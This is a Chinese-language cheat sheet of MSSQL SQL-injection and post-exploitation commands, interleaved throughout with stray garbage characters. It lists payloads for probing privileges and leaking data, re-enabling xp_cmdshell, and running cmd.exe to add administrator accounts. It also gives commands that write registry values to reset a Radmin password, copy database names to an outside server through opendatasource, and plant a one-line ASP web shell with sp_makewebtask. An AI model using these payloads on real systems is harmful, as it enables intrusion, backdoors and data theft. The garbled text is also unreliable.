常用的一些注入命令

admin

//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
. P5 g) }3 G5 Q  B! lAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
0 H( T' z+ I9 s" B6 E
5 _5 A2 d* Q( _* d" g' a4 C4 d//检测是否有读取某数据库的权限
- ?9 J1 A( \7 q- D. i% |7 c. H) eand 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --


# T, m! u8 I+ A数字类型
" B& j. d% c& S0 h5 Yand char(124)%2Buser%2Bchar(124)=0
  t; t; X1 h. g1 ]7 v+ s
* W1 j! U1 z) _9 G# [+ D字符类型
1 s' c( |5 W, ]6 B7 L' and char(124)%2Buser%2Bchar(124)=0 and ''='
9 s5 F- z! d+ h2 v( J) H& c
! B$ ]) o! h! w! l: @4 Y: I) `1 d3 C搜索类型
( F/ @  _7 J* D2 @' x( G) [  W! y( g' and char(124)%2Buser%2Bchar(124)=0 and '%'='
( h' q* }3 k; z% I: M9 e
爆用户名
  J0 {$ \, l9 h. I3 Land user>0
' and user>0 and ''='
" v9 \6 D4 M  i6 L. `8 ]
! x( c' g4 w# V5 `检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
( \* N* U2 M6 h( Y9 FAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
* I6 k5 [8 Q6 I1 B1 o! ]0 m
; P# @9 a5 D7 a' u! N& W" B! H检测是不是MSSQL数据库
7 X2 f+ ~1 F3 l9 b' r3 P/ C) mand exists (select * from sysobjects);--

4 |. C( l1 M$ h1 D( X' K# {7 C检测是否支持多行
) T$ m/ J: d2 f0 B;declare @d int;--
' r2 j+ }& D( G5 @8 A* o
恢复 xp_cmdshell
2 b1 M9 F8 C2 @& D5 D;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
) P0 r, N, i9 n+ N# g, h7 b, J& J

select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
; H' G0 q' E  G' n
//-----------------------
//       执行命令
/ v6 D( A! c4 G# J2 t//-----------------------
: |* V6 O4 W" z, w  U! s首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
0 J1 ?% o9 H' i9 Z
3 }6 @8 A" s& b5 \. l' d4 b然后利用jet.oledb执行系统命令
- j* ]6 y1 o+ h$ ~select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
4 D& r; V5 k" F, n5 t. _! Z9 ^
6 n9 N+ o! E& e( R' E  F执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
$ Y& S* a( @; U! U$ r
判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

, O1 x$ ?& A: w# v写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
  K% K, |) h. r
5 A: M$ f& X& V. a+ D1 w* UREG_SZ
" [' L0 N. T% R
8 ~: d1 U2 k- ]" o9 l* |# q读注册表
- P5 [2 N& w& [5 Vexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
8 ^* P6 t. }. ]5 K
读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1
) U+ B, M# r/ |2 O) m  w6 P
% F' n: w- V) ~/ P7 K# d5 z
数据库备份
6 X( s3 t' ]' w# v2 K/ m1 m5 Jbackup database pubs to disk = 'c:\123.bak'
3 V( ^# n' a( E, T9 M% Z( v
//爆出长度
- f# @+ X8 b" e, Q) F% M' YAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
$ v$ |; `) O3 g* G5 w2 z
( G! ^9 G1 [' H4 a

, ^' q& h% X; j# N更改sa口令方法：用sql综合利用工具连接后，执行命令：
1 ~5 E% u, P$ Z' J/ ~) F7 _0 n, Uexec sp_password NULL,'新密码','sa'

添加和删除一个SA权限的用户test：
: A4 X0 B* X) z: O! s0 lexec master.dbo.sp_addlogin test,9530772
exec master.dbo.sp_addsrvrolemember test,sysadmin
4 M( @4 F  h) q( m" ?! [
: N$ R. P/ q  v: e删除扩展存储过过程xp_cmdshell的语句:
; O" O3 c# o2 g9 \6 X- Eexec sp_dropextendedproc 'xp_cmdshell'

添加扩展存储过过程
+ U$ q; i; S  \EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
3 z6 D' Y: h+ b. j+ e. E( `0 c& p3 NGRANT exec On xp_proxiedadata TO public
" j9 |: K* n1 u. q5 j1 _8 A1 g) z
" \$ T1 f* f# ^" y( G, G
停掉或激活某个服务。
/ t) [" T* G  C
9 `/ t' T7 i2 a5 l- Jexec master..xp_servicecontrol 'stop','schedule'
; ^' }/ {  S0 ]/ \7 P' Yexec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某个目录下的子目录。
0 [# h3 G) j! Uxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
$ w* S6 J5 ]; @
dbo.xp_makecab
( p* W' Y( x$ |9 M
将目标多个档案压缩到某个目标档案之内。
$ i$ C) l+ P5 I# m5 _5 J# y  h所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
'c:\test.cab','mszip',1,
% z" P5 B! D4 p+ I/ f5 t'C:\Inetpub\wwwroot\SQLInject\login.asp',
4 a% G$ k0 `* \9 ~* i'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process

+ ~$ ?5 a, I2 q% y5 q& N' C停掉某个执行中的程序，但赋予的参数是 Process ID。
4 s6 L: G; N$ X9 N: n2 j+ I利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

/ e8 H/ U( b5 ^' X; z! \. Txp_terminate_process 2484
) {# e! Z  H" e- q9 J
" _1 e0 x6 i" G9 w, z  wxp_unpackcab

解开压缩档。

) f2 `/ o" A+ I# t4 X0 g3 Z. oxp_unpackcab 'c:\test.cab','c:\temp',1
- D- v- |; e! @" y
. V7 X) d, Y& z; x" k* u
8 n+ @0 V2 {; `" K7 F某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
7 H$ ~  `  L' l) }
/ g3 F, T& i0 p" F) w3 ~create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
8 f5 L* r2 H7 y: v8 s
//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

( ~! r# }0 J; r4 ~, L
) E+ ?- I* D( I" G7 D9 |% H//在Master中创建表，看看权限怎样
, {! W- W* S9 v# oCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
% J) t9 @. C0 I8 T2 n
用 sp_makewebtask直接在web目录里写入一句话马：
# a6 [( d* P" [http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
$ _/ A9 _- }! E" \: M* `
//更新表内容
Update films SET kind = 'Dramatic' Where id = 123
7 E, e: |3 |- h& ]
//删除内容
delete from table_name where Stockid = 3